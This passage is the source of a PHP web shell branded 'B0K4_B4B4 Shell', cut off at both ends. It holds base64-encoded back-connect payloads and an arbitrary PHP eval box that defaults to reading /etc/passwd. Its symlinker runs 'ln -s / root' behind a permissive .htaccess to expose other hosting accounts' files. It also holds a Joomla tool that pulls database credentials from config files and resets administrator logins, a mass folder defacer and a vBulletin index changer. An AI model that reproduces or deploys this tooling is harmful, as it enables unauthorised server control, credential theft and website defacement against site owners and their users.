LSLK9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqNOElQTjnxPc8kR
rVo
vaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0b
jGB
+hecfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8=&quot;;$back_connect=&quot;fZFRS8Mw
FIXfB/sPWSw2hUrnqyPC0CpD3KStvqh0XRpcsE1KkoKF/XiTtCIV6tu55+Z89yY5W0St
ktGB8aihsprPWkVBKsgn1av5zCN1iQGsOv4Fbak6pWmNgU/JUQC4b3lRU3BR7OFqcFhptMOpo
28j
S2whVulCflCNvXVy//K6fLdWI+SPcekMVpSlxIxTnRdacDSEAnA6gZJRBGMphbwC3uKNw8AhX
EKZ
ja3ImclYagh61n9JKbTAhu7EobN3Qb4mjW/byr0BSnc3D3EWgqe7fLO1whp5miXx+tHMcNHpG
URw
Tskvpd92+rxoKEdpdrvZhgBen/exUWf3nE214iT52+r/Cw3/5jaqhKL9iFFpuKPawILVNw==&quot;
;$back_connect_c=&quot;XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94
k29rWhyEzc+Z2TjpSserA
BYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl95/3Wa43fpotyCAB
R95
zzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vKC1rI6wgSmN/niY
b75
i+21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVCnim7a/ZuJC0JTw
f3A
RkD0fR+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlxiuPB3E0/gXejiH
McY
jwcYguIAe2GMNijZ9jL4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3XIe1bxKw77YTyt6
T2F 6f9wGEPxJliFkv5Oqr4tE5LYEnoyIfDwdHcXK1ilrfAdUbPPLw==&quot;; ?&gt;
&lt;html&gt;&lt;head&gt;&lt;title&gt;B0K4_B4B4&lt;/title&gt;&lt;link
href='http://fonts.googleapis.com/css?family=Orbitron:700'
rel='stylesheet' type='text/css'&gt;
&lt;script type=&quot;text/javascript&quot;&gt;
function tukar(lama,baru){document.getElementById(lama).style.display =
'none';
document.getElementById(baru).style.display = 'block';}
&lt;/script&gt;
&lt;style&gt;.title{font-weight:bold;letter-spacing:1px;font-family:
&quot;orbitron&quot;;color: #00ff00;font-size:20px;text-shadow: 5px 5px 5px
black;}input[type=text]{-moz-box-shadow:0 0 1px black;-webkit-boxshadow:0 0 1px black;height:18px;margin-left: 5px;}input:focus,
textarea:focus ,button:active{box-shadow: 0 0 5px #4C83AF;-webkit-boxshadow: 0 0 5px rgba(0, 0, 255, 1);-moz-box-shadow: 0 0 5px rgba(0, 0,
255, 1);background:#222222;overflow: auto;}#menu{fontfamily:orbitron;background: #111111;margin:5px 2px 4px 2px;}div #menu
li:hover {cursor:pointer;}div#menu li:hover&gt;ul
a:hover{width:118;background:red;}div#menu ul
{margin:0;padding:0;float:left;-moz-border-radius: 6px; border-radius:
12px; border:1px solid #555555;}div#menu li
{position:relative;display:block;float:left;}div#menu li:hover&gt;ul
{left:0px;border-left:1px solid white;}div#menu
a{display:block;float:left;font-family:orbitron;padding:4px
6px;margin:0;text-decoration:none;letterspacing:1px;color:white;}div#menu a:hover{background:rgba(160, 82,
45,0.3);font-family:orbitron;border-bottom:0px;}div#menu ul ul
{position:absolute;top:18px;left:-990em;width:130px;padding:5px 0 5px
0;background:black;margin-top:2px;}div#menu ul ul a {padding:2px 2px 2px
10px;height:20px;float:none;display:block;color:white;}.B0K4_B4B42 {textalign: center;letter-spacing:1px;font-family: &quot;orbitron&quot;;color:
#00ff00;font-size:25px;text-shadow: 5px 5px 5px black;} .mybox{-mozborder-radius: 10px; border-radius: 10px;border:1px solid #EC4D00;
padding:4px 2px;width:70%;line-height:24px;background:#111111;box-shadow:
0px 4px 2px white;-webkit-box-shadow: 0px 4px 2px #ffffff;-moz-boxshadow: 0px 4px 2px #ffffff;}.myboxtbl{ width:50%;
}body{background:#010101;} a {text-decoration:none;} hr, a:hover{borderbottom:1px solid #4C83AF;} *{text-shadow: 0pt 0pt 0.3em rgb(153, 153,
153);font-size:11px;font-family:Tahoma,Verdana,Arial;color:#FFFFFF;}
.tabnet{margin:15px auto 0 auto;border: 1px solid #333333;} .main
{width:100%;} .gaya {color: #888888;} .top{border-left:1px solid
#4C83AF;border-RIGHT:1px solid #4C83AF;font-family:verdana;} .inputz,
option{outline:none;transition: all 0.20s ease-in-out;-webkit-transition:
all 0.20s ease-in-out;-moz-transition: all 0.20s ease-in-out;border:1px
solid rgba(0,0,0, 0.2);background:#111111; border:0; padding:2px; borderbottom:1px solid #393939; font-size:11px; color:#ffffff; -moz-borderradius: 6px; border-radius: 12px; border:1px solid #4C83AF;margin:4px 0
8px 0;} .inputzbut{background:#111111;color:#8f8f8f;margin:0
4px;border:1px solid #555555;}
.inputzbut:hover{background:#222222;border-left:1px solid #4C83AF;borderright:1px solid #4C83AF;border-bottom:1px solid #4C83AF;border-top:1px
solid #4C83AF;}.inputz:hover{ -moz-border-radius: 6px; border-radius:
10px; border:1px solid #4C83AF;margin:4px 0 8px 0;border-bottom:1px solid
#4C83AF;border-top:1px solid #4C83AF;}.output2 {margin:auto;border:1px
solid #888888;background:#000000;padding:0 2px;}
textarea{margin:auto;border:2px solid
#555555;background:#000000;padding:0 2px;} .output
{margin:auto;border:1px solid
#303030;width:100%;height:400px;background:#000000;padding:0 2px;}
.cmdbox{width:100%;}.head_info{padding: 0 4px;} .b1{fontsize:30px;padding:0;color:#555555;} .b2{fontsize:30px;padding:0;color:#800000;} .b_tbl{text-align:center;margin:0 4px
0 0;padding:0 4px 0 0;border-right:1px solid #333333;} .phpinfo
table{width:100%;padding:0 0 0 0;} .phpinfo
td{background:#111111;color:#cccccc;padding:6px 8px;;} .phpinfo th,
th{background:#191919;border-bottom:1px solid #333333;fontweight:normal;} .phpinfo h2, .phpinfo h2 a{text-align:center;fontsize:16px;padding:0;margin:30px 0 0 0;background:#222222;padding:4px 0;}
.explore{width:100%;} .explore a {text-decoration:none;} .explore
td{border-bottom:1px solid #454545;padding:0 8px;line-height:24px;}
.explore th{padding:3px 8px;font-weight:normal;color:#999999;} .explore
th:hover , .phpinfo th:hover, th:hover{color:black;background:#00ff00;}
.explore tr:hover{background:rgba(35,96,156,0.2);}
.viewfile{background:#EDECEB;color:#000000;margin:4px 2px;padding:8px;}
.sembunyi{display:none;padding:0;margin:0;} k, k a, k a:hover{textshadow: 0pt 0pt 0.3em red;font-family:orbitron;fontsize:25px;color:#ffffff;}&lt;/style&gt;&lt;body
onLoad=&quot;document.getElementById('cmd').focus();&quot;&gt;&lt;div class=&quot;main&quot;&gt;&lt;div
class=&quot;head_info&quot;&gt; &lt;table width=&quot;100%&quot;&gt;&lt;tr&gt;&lt;td width=&quot;23%&quot;&gt;&lt;table
class=&quot;b_tbl&quot;&gt;
&lt;?php echo
strtoupper((base64_decode('PGgyIGNsYXNzPSJ0aXRsZSI+azJsbDMzZCBTaGVsbDwvaD
I+ICA=')));?&gt;&lt;div id=&quot;menu&quot;&gt;&lt;a href=&quot;?&lt;?php echo
&quot;y=&quot;.$pwd;?&gt;&amp;amp;x=about&quot;&gt;About Me&lt;/a&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;td class=&quot;top&quot; width='60%'&gt;&lt;?php echo
$buff;?&gt;&lt;/td&gt;&amp;nbsp;&amp;nbsp;&lt;td style=&quot;width:20%;&quot;&gt;&lt;a&gt;server ip : &lt;?php echo
$server_ip.&quot;&lt;br&gt;&lt;br&gt; your ip : &quot;.$my_ip.&quot;&lt;br&gt;&lt;/a&gt;&quot;;?&gt;&lt;br&gt;&lt;a href=&quot;?&quot;
style=&quot;border:1px solid #EC4D00;font:12px
orbitron;width:200px;padding:0px 20px 0px 20px;&quot;&gt;H O M
E&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/div&gt;
&lt;div id=&quot;menu&quot;&gt;&lt;ul class=&quot;menu&quot;&gt;&lt;a href=&quot;?&lt;?php echo
&quot;y=&quot;.$pwd;?&gt;&quot;&gt;Files&lt;/a&gt;&lt;a href=&quot;?&lt;?php echo
&quot;y=&quot;.$pwd;?&gt;&amp;amp;x=shell&quot;&gt;Shell&lt;/a&gt;&lt;a href=&quot;?&lt;?php echo
&quot;y=&quot;.$pwd;?&gt;&amp;amp;x=upload&quot;&gt;upload&lt;/a&gt;&lt;li&gt;&lt;a&gt;Sym&lt;/a&gt;&lt;ul&gt;&lt;li&gt;&lt;a
href=&quot;?&lt;?php echo &quot;y=&quot;.$pwd;?&gt;&amp;amp;x=sf&quot;&gt;Symlink File&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a
href=&quot;?&lt;?php echo &quot;y=&quot;.$pwd;?&gt;&amp;amp;x=sec&quot;&gt;Symlink server&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a
href=&quot;?&lt;?php echo &quot;y=&quot;.$pwd;?&gt;&amp;amp;x=configs&quot;&gt;Get
configs&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;a href=&quot;?&lt;?php echo
&quot;y=&quot;.$pwd;?&gt;&amp;amp;x=php&quot;&gt;Eval&lt;/a&gt;&lt;a href=&quot;?&lt;?php echo
&quot;y=&quot;.$pwd;?&gt;&amp;amp;x=back&quot;&gt;Remote&lt;/a&gt;&lt;a href=&quot;?&lt;?php echo
&quot;y=&quot;.$pwd;?&gt;&amp;amp;x=mysql&quot;&gt;Sql&lt;/a&gt;&lt;a href=&quot;?&lt;?php echo
&quot;y=&quot;.$pwd;?&gt;&amp;amp;x=mass&quot;&gt;Mass&lt;/a&gt;&lt;a href=&quot;?&lt;?php echo
&quot;y=&quot;.$pwd;?&gt;&amp;amp;x=brute&quot;&gt;Brute&lt;/a&gt;&lt;a href=&quot;?&lt;?php echo
&quot;y=&quot;.$pwd;?&gt;&amp;amp;x=phpinfo&quot;&gt;PHP&lt;/a&gt;&lt;a href=&quot;?&lt;?php echo
&quot;y=&quot;.$pwd;?&gt;&amp;amp;x=zone-h&quot;&gt;Zone-H&lt;/a&gt;&lt;li&gt;&lt;a&gt;Joomla&lt;/a&gt;&lt;ul&gt;&lt;li&gt;&lt;a
href=&quot;?&lt;?php echo &quot;y=&quot;.$pwd;?&gt;&amp;amp;x=joomla&quot;&gt;From keyboard&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a
href=&quot;?&lt;?php echo &quot;y=&quot;.$pwd;?&gt;&amp;amp;x=js&quot;&gt;From
symlink&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;li&gt;&lt;a&gt;Wordpress&lt;/a&gt;&lt;ul&gt;&lt;li&gt;&lt;a href=&quot;?&lt;?php
echo &quot;y=&quot;.$pwd;?&gt;&amp;amp;x=keyboard&quot;&gt;From Keyboard&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a
href=&quot;?&lt;?php echo &quot;y=&quot;.$pwd;?&gt;&amp;amp;x=config&quot;&gt;From
Symlink&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;a href=&quot;?&lt;?php echo
&quot;y=&quot;.$pwd;?&gt;&amp;amp;x=vb&quot;&gt;Vb&lt;/a&gt;&lt;a href=&quot;?&lt;?php echo
&quot;y=&quot;.$pwd;?&gt;&amp;amp;x=domains&quot;&gt;Domains&lt;/a&gt;&lt;a href=&quot;?&lt;?php echo
&quot;y=&quot;.$pwd;?&gt;&amp;amp;x=string&quot;&gt;String&lt;/a&gt;&lt;a href=&quot;?&lt;?php echo
&quot;y=&quot;.$pwd;?&gt;&amp;amp;x=boom&quot;&gt;Boom&lt;/a&gt;&amp;nbsp;&amp;nbsp;&lt;/ul&gt;&lt;/div&gt;&lt;br&gt;&lt;br&gt;
&lt;?php if(isset($_GET['x']) &amp;&amp; ($_GET['x'] == 'php')){?&gt;&lt;form
action=&quot;?y=&lt;?php echo $pwd;?&gt;&amp;amp;x=php&quot; method=&quot;post&quot;&gt;&lt;table
class=&quot;cmdbox&quot;&gt;&lt;tr&gt;&lt;td&gt;&lt;textarea class=&quot;output&quot; name=&quot;cmd&quot; id=&quot;cmd&quot;
cols=90&gt;
&lt;?php if(isset($_POST['submitcmd'])) {echo
eval(magicboom($_POST['cmd']));}else echo &quot;echo
file_get_contents('/etc/passwd');&quot;;?&gt;&lt;/textarea&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;input
style=&quot;width:19%;&quot; class=&quot;inputzbut&quot; type=&quot;submit&quot; value=&quot;Do !&quot;
name=&quot;submitcmd&quot; /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/form&gt;&lt;/table&gt;&lt;/form&gt; &lt;?php }
elseif(isset($_GET['x']) &amp;&amp; ($_GET['x'] == 'about')){echo
'&lt;center&gt;&lt;br&gt;&lt;br&gt;&lt;div class=&quot;mybox&quot;&gt;&lt;br&gt;&lt;h2 style=&quot;font-size:50px;&quot;
class=&quot;B0K4_B4B42&quot;&gt;B0K4_B4B4 Shell&lt;/h2&gt;&lt;k&gt;By B0K4_B4B4&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;a
href=mailto:B0K4_B4B4@live.fr&gt;Mail&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a
href=&quot;http://facebook.com/B0K4_B4B4&quot;
target=&quot;_blank&quot;&gt;Facebook&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href=&quot;http://zoneh.org/archive/notifier=ReZK2LL&quot; target=&quot;_blank&quot;&gt;Zone-H&lt;/a&gt;&lt;/k&gt;&lt;br&gt;&lt;br&gt;&lt;h3
style=&quot;font:25px
orbitron;color:#ff0000;&quot;&gt;'.date('Y').'&lt;/h3&gt;&lt;/div&gt;&lt;/center&gt;';}
elseif(isset($_GET['x']) &amp;&amp; ($_GET['x'] == 'sf'))
{@set_time_limit(0);@mkdir('sym',0777);error_reporting(0);$htaccess =
&quot;Options all \n DirectoryIndex gaza.html \n AddType text/plain .php \n
AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler
txt .html \n Require None \n Satisfy Any&quot;;$op =@fopen
('sym/.htaccess','w');fwrite($op ,$htaccess);echo
'&lt;center&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;div class=&quot;mybox&quot;&gt;&lt;h2
class=&quot;B0K4_B4B42&quot;&gt;Symlinker&lt;/h2&gt;&lt;br&gt;&lt;form method=&quot;post&quot;&gt; File
Path:&lt;br&gt;&lt;input class=&quot;inputz&quot; type=&quot;text&quot; name=&quot;file&quot;
value=&quot;/home/user/public_html/config.php&quot; size=&quot;60&quot;/&gt;&lt;br&gt;Symlink
Name&lt;br&gt;&lt;input class=&quot;inputz&quot; type=&quot;text&quot; name=&quot;symfile&quot; value=&quot;s.txt&quot;
size=&quot;60&quot;/&gt;&lt;br&gt;&lt;br&gt;&lt;input class=&quot;inputzbut&quot; type=&quot;submit&quot; value=&quot;symlink&quot;
name=&quot;symlink&quot; /&gt;&lt;br&gt;&lt;br&gt;&lt;/form&gt;&lt;/div&gt;&lt;/center&gt;';$target =
$_POST['file'];$symfile = $_POST['symfile'];$symlink =
$_POST['symlink'];if ($symlink) {@symlink(&quot;$target&quot;,&quot;sym/$symfile&quot;);echo
'&lt;br&gt;&lt;center&gt;&lt;a target=&quot;_blank&quot; href=&quot;sym/'.$symfile.'&quot;
&gt;'.$symfile.'&lt;/a&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;/center&gt;';}}
elseif(isset($_GET['x']) &amp;&amp; ($_GET['x'] == 'js')) {if ($_POST['symjo'])
{$config = file_get_contents($_POST['url']);$user = $_POST['user'];$pass
= md5($_POST['pass']);function ex($text,$a,$b){$explode =
explode($a,$text);$explode = explode($b,$explode[1]);return
$explode[0];}if($config &amp;&amp; ereg('JConfig',$config)){$psswd =
ex($config,'$password = \'',&quot;';&quot;);$username = ex($config,'$user =
\'',&quot;';&quot;);$dbname = ex($config,'$db = \'',&quot;';&quot;);$prefix =
ex($config,'$dbprefix = \'',&quot;';&quot;);$host = ex($config,'$host =
\'',&quot;';&quot;);$email = ex($config,'$mailfrom = \'',&quot;';&quot;);$formn =
ex($config,'$fromname = \'',&quot;';&quot;);$conn =
mysql_connect($host,$username,$psswd) or
die(mysql_error());mysql_select_db($dbname,$conn) or die($username.'
'.$psswd.' '.$host.' '.$dbname);$query = @mysql_query(&quot;UPDATE
`&quot;.$prefix.&quot;users` SET `username` ='&quot;.$user.&quot;' , `password` =
'&quot;.$pass.&quot;', `usertype` = 'Super Administrator', `block` = 0&quot;);if
($query) {echo '&lt;center&gt;&lt;h2 class=&quot;B0K4_B4B42&quot;&gt;Done
!&lt;/h2&gt;&lt;/center&gt;&lt;br&gt;&lt;table width=&quot;100%&quot;&gt;&lt;tr&gt;&lt;th width=&quot;30%&quot;&gt;site
name&lt;/th&gt;&lt;th width=&quot;20%&quot;&gt;user&lt;/th&gt;&lt;th width=&quot;20%&quot;&gt;password&lt;/th&gt;&lt;th
width=&quot;20%&quot;&gt;email&lt;/th&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td width=&quot;20%&quot;&gt;&lt;font size=&quot;2&quot;
color=&quot;red&quot;&gt;'.$formn.'&lt;/font&gt;&lt;/td&gt;&lt;td width=&quot;20%&quot;&gt;'.$user.'&lt;/td&gt;&lt;td
with=&quot;20%&quot;&gt;'.$_POST[&quot;pass&quot;].'&lt;/td&gt;&lt;td
width=&quot;20%&quot;&gt;'.$email.'&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;';}else {echo '&lt;h2
class=&quot;B0K4_B4B42&quot;&gt;&lt;font color=&quot;#ff0000&quot;&gt;ERROR !&lt;/font&gt;&lt;/h2&gt;';}}else
die('&lt;h2 class=&quot;B0K4_B4B42&quot;&gt;&lt;font color=&quot;red&quot;&gt;Not a joomla
config&lt;/font&gt;&lt;/h2&gt;');}else { ?&gt; &lt;center&gt;&lt;br&gt;&lt;br&gt;&lt;div class=&quot;mybox&quot;&gt;&lt;form
method=&quot;post&quot;&gt;&lt;table&gt;&lt;h2 class=&quot;B0K4_B4B42&quot;&gt;Joomla login changer (
symlink version )&lt;/h2&gt;&lt;tr&gt;&lt;td&gt;config link : &lt;/td&gt;&lt;td&gt;&lt;input
class=&quot;inputz&quot; type=&quot;text&quot; name=&quot;url&quot; value=&quot;&quot;&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;new user
: &lt;/td&gt;&lt;td&gt;&lt;input class=&quot;inputz&quot; type=&quot;text&quot; name=&quot;user&quot;
value=&quot;admin&quot;&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;new password : &lt;/td&gt;&lt;td&gt;&lt;input
class=&quot;inputz&quot; type=&quot;text&quot; name=&quot;pass&quot;
value=&quot;123123&quot;&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;input
type=&quot;submit&quot; class=&quot;inputzbut&quot; name=&quot;symjo&quot;
value=&quot;change&quot;&gt;&lt;/td&gt;&lt;br&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/form&gt;&lt;/div&gt;&lt;/center&gt;&lt;?php }}
elseif(isset($_GET['x']) &amp;&amp; ($_GET['x'] == 'sec')){$d0mains =
@file(&quot;/etc/named.conf&quot;);
if($d0mains){@mkdir(&quot;k2&quot;,0777);@chdir(&quot;k2&quot;);@exe(&quot;ln -s / root&quot;);$file3 =
'Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any';$fp3 = fopen('.htaccess','w');$fw3 =
fwrite($fp3,$file3);@fclose($fp3);echo &quot;&lt;table align=center border=1
style='width:60%;border-color:#333333;'&gt;&lt;tr&gt;&lt;td align=center&gt;&lt;font
size=3&gt;S. No.&lt;/font&gt;&lt;/td&gt;&lt;td align=center&gt;&lt;font
size=3&gt;Domains&lt;/font&gt;&lt;/td&gt;&lt;td align=center&gt;&lt;font
size=3&gt;Users&lt;/font&gt;&lt;/td&gt;&lt;td align=center&gt;&lt;font
size=3&gt;Symlink&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&quot;;$dcount = 1;foreach($d0mains as
$d0main){if(eregi(&quot;zone&quot;,$d0main)){preg_match_all('#zone &quot;(.*)&quot;#',
$d0main, $domains);flush();if(strlen(trim($domains[1][0])) &gt; 2){$user =
posix_getpwuid(@fileowner(&quot;/etc/valiases/&quot;.$domains[1][0]));echo &quot;&lt;tr
align=center&gt;&lt;td&gt;&lt;font size=3&gt;&quot; . $dcount . &quot;&lt;/font&gt;&lt;/td&gt;&lt;td
align=left&gt;&lt;a href=http://www.&quot;.$domains[1][0].&quot;/&gt;&lt;font
class=txt&gt;&quot;.$domains[1][0].&quot;&lt;/font&gt;&lt;/a&gt;&lt;/td&gt;&lt;td&gt;&quot;.$user['name'].&quot;&lt;/td&gt;&lt;td
&gt;&lt;a href='/k2/root/home/&quot;.$user['name'].&quot;/public_html'
target='_blank'&gt;&lt;font class=txt&gt;Symlink&lt;/font&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&quot;;
flush();$dcount++;}}}echo &quot;&lt;/table&gt;&quot;;}else{$TEST=@file('/etc/passwd');if
($TEST){@mkdir(&quot;k2&quot;,0777);@chdir(&quot;k2&quot;);exe(&quot;ln -s / root&quot;);$file3 =
'Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any';$fp3 = fopen('.htaccess','w');$fw3 =
fwrite($fp3,$file3);@fclose($fp3);echo &quot;&lt;br&gt;&lt;br&gt;&lt;table align=center
border=1&gt;&lt;tr&gt;&lt;td align=center&gt;&lt;font size=4&gt;S. No.&lt;/font&gt;&lt;/td&gt;&lt;td
align=center&gt;&lt;font size=4&gt;Users&lt;/font&gt;&lt;/td&gt;&lt;td align=center&gt;&lt;font
size=4&gt;Symlink&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&quot;;$dcount = 1;$file = fopen(&quot;/etc/passwd&quot;,
&quot;r&quot;) or exit(&quot;Unable to open file!&quot;);while(!feof($file)){$s =
fgets($file);$matches = array();$t = preg_match('/\/(.*?)\:\//s', $s,
$matches);$matches =
str_replace(&quot;home/&quot;,&quot;&quot;,$matches[1]);if(strlen($matches) &gt; 12 ||
strlen($matches) == 0 || $matches == &quot;bin&quot; || $matches == &quot;etc/X11/fs&quot; ||
$matches == &quot;var/lib/nfs&quot; || $matches == &quot;var/arpwatch&quot; || $matches ==
&quot;var/gopher&quot; || $matches == &quot;sbin&quot; || $matches == &quot;var/adm&quot; || $matches
== &quot;usr/games&quot; || $matches == &quot;var/ftp&quot; || $matches == &quot;etc/ntp&quot; ||
$matches == &quot;var/www&quot; || $matches == &quot;var/named&quot;)continue;echo &quot;&lt;tr&gt;&lt;td
align=center&gt;&lt;font size=3&gt;&quot; . $dcount . &quot;&lt;/td&gt;&lt;td align=center&gt;&lt;font
class=txt&gt;&quot; . $matches . &quot;&lt;/td&gt;&quot;;echo &quot;&lt;td align=center&gt;&lt;font
class=txt&gt;&lt;a href=/k2/root/home/&quot; . $matches . &quot;/public_html
target='_blank'&gt;Symlink&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&quot;;$dcount++;}fclose($file);echo
&quot;&lt;/table&gt;&quot;;}else{if($os !=
&quot;Windows&quot;){@mkdir(&quot;k2&quot;,0777);@chdir(&quot;k2&quot;);@exe(&quot;ln -s / root&quot;);$file3 =
'Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any';$fp3 = fopen('.htaccess','w');$fw3 =
fwrite($fp3,$file3);@fclose($fp3);echo &quot;&lt;br&gt;&lt;br&gt;&lt;center&gt;&lt;div
class='mybox'&gt;&lt;h2 class='B0K4_B4B42'&gt;server symlinker&lt;/h2&gt;&lt;table
align=center border=1&gt;&lt;tr&gt;&lt;td align=center&gt;&lt;font size=4&gt;id&lt;/font&gt;&lt;/td&gt;&lt;td
align=center&gt;&lt;font size=4&gt;Users&lt;/font&gt;&lt;/td&gt;&lt;td align=center&gt;&lt;font
size=4&gt;Symlink&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&quot;;$temp = &quot;&quot;;$val1 = 0;$val2 =
1000;for(;$val1 &lt;= $val2;$val1++) {$uid = @posix_getpwuid($val1);if
($uid)$temp .= join(':',$uid).&quot;\n&quot;;}echo '&lt;br/&gt;';$temp =
trim($temp);$file5 =
fopen(&quot;test.txt&quot;,&quot;w&quot;);fputs($file5,$temp);fclose($file5);$dcount =
1;$file = fopen(&quot;test.txt&quot;, &quot;r&quot;) or exit(&quot;Unable to open
file!&quot;);while(!feof($file)){$s = fgets($file);$matches = array();$t =
preg_match('/\/(.*?)\:\//s', $s, $matches);$matches =
str_replace(&quot;home/&quot;,&quot;&quot;,$matches[1]);if(strlen($matches) &gt; 12 ||
strlen($matches) == 0 || $matches == &quot;bin&quot; || $matches == &quot;etc/X11/fs&quot; ||
$matches == &quot;var/lib/nfs&quot; || $matches == &quot;var/arpwatch&quot; || $matches ==
&quot;var/gopher&quot; || $matches == &quot;sbin&quot; || $matches == &quot;var/adm&quot; || $matches
== &quot;usr/games&quot; || $matches == &quot;var/ftp&quot; || $matches == &quot;etc/ntp&quot; ||
$matches == &quot;var/www&quot; || $matches == &quot;var/named&quot;)continue;echo &quot;&lt;tr&gt;&lt;td
align=center&gt;&lt;font size=3&gt;&quot; . $dcount . &quot;&lt;/td&gt;&lt;td align=center&gt;&lt;font
class=txt&gt;&quot; . $matches . &quot;&lt;/td&gt;&quot;;echo &quot;&lt;td align=center&gt;&lt;font
class=txt&gt;&lt;a href=/k2/root/home/&quot; . $matches . &quot;/public_html
target='_blank'&gt;Symlink&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&quot;;$dcount++;}fclose($file);echo
&quot;&lt;/table&gt;&lt;/div&gt;&lt;/center&gt;&quot;;unlink(&quot;test.txt&quot;);} else echo &quot;&lt;center&gt;&lt;font
size=4&gt;Cannot create Symlink&lt;/font&gt;&lt;/center&gt;&quot;;}}}
elseif(isset($_GET['x']) &amp;&amp; ($_GET['x'] ==
'mass')){error_reporting(0);?&gt;&lt;center&gt;&lt;br&gt;&lt;br&gt;&lt;div class=&quot;mybox&quot;&gt;&lt;h2
class=&quot;B0K4_B4B42&quot;&gt;Folder Mass Defacer&lt;/h2&gt;&lt;center/&gt;&lt;br&gt;&lt;center&gt;&lt;form
ENCTYPE=&quot;multipart/form-data&quot; action=&quot;&lt;?$_SERVER['PHP_SELF']?&gt;&quot;
method=post&gt;Folder :&lt;br/&gt;&lt;input class=&quot;inputz&quot; typ=text name=path size=60
value=&quot;&lt;?=getcwd();?&gt;&quot;&gt;&lt;br&gt;File Name :&lt;br/&gt;&lt;input class=&quot;inputz&quot; typ=text
name=file size=60 value=&quot;index.php&quot;&gt;&lt;br&gt;index URL :&lt;br/&gt;&lt;input
class=&quot;inputz&quot; typ=text name=url size=60 value=&quot;&quot;&gt;&lt;br&gt;&lt;input
class=&quot;inputzbut&quot; type=submit value=Deface&gt;&lt;/form&gt;&lt;/div&gt;&lt;/center&gt;&lt;?php
@error_reporting(0);$mainpath=$_POST[path];$file=$_POST[file];$indexurl=$
_POST[url];echo
&quot;&lt;br&gt;&quot;;$dir=opendir(&quot;$mainpath&quot;);while($row=readdir($dir)){$start=@fopen(
&quot;$row/$file&quot;,&quot;w+&quot;);$code=@file_get_contents($indexurl);$finish=@fwrite($s
tart,$code);if ($finish){echo &quot;&amp;#187; $row/$file &amp;#187;
Done&lt;br&gt;&lt;br&gt;&quot;;}}}
elseif(isset($_GET['x']) &amp;&amp; ($_GET['x'] == 'vb'))
{if(empty($_POST['index'])){echo &quot;&lt;center&gt;&lt;br&gt;&lt;br&gt;&lt;div width='100%'
class='mybox'&gt;&lt;br&gt;&lt;h2 class='B0K4_B4B42'&gt;Vbulletin index
changer&lt;/h2&gt;&lt;br&gt;&lt;FORM method='POST'&gt;host : &lt;INPUT size='12'
class='inputz' value='localhost' name='localhost'
type='text'&gt;&amp;nbsp;|&amp;nbsp;database : &lt;INPUT class='inputz' size='12'
value='db_name' name='database' type='text'&gt;&amp;nbsp;|&amp;nbsp;username :
&lt;INPUT class='inputz' size='10' value='db_user' name='username'
type='text'&gt;&amp;nbsp;|&amp;nbsp;password : &lt;INPUT class='inputz' size='10'
value='bd_pass' name='password' type='text'&gt;&amp;nbsp;|&amp;nbsp;perfix : &lt;input
class='inputz' size='10' value='' name='perfix'
type='text'&gt;&lt;br&gt;&lt;br&gt;&lt;textarea class='inputz' name='index' cols='40'
rows='10'&gt;Hacked By ReZK2LL Team&lt;/textarea&gt;&lt;br&gt;&lt;INPUT class='inputzbut'
value='Deface' name='send'
type='submit'&gt;&lt;/FORM&gt;&lt;/div&gt;&lt;/center&gt;&quot;;}else{$localhost =
$_POST['localhost'];$database = $_POST['database'];$username =
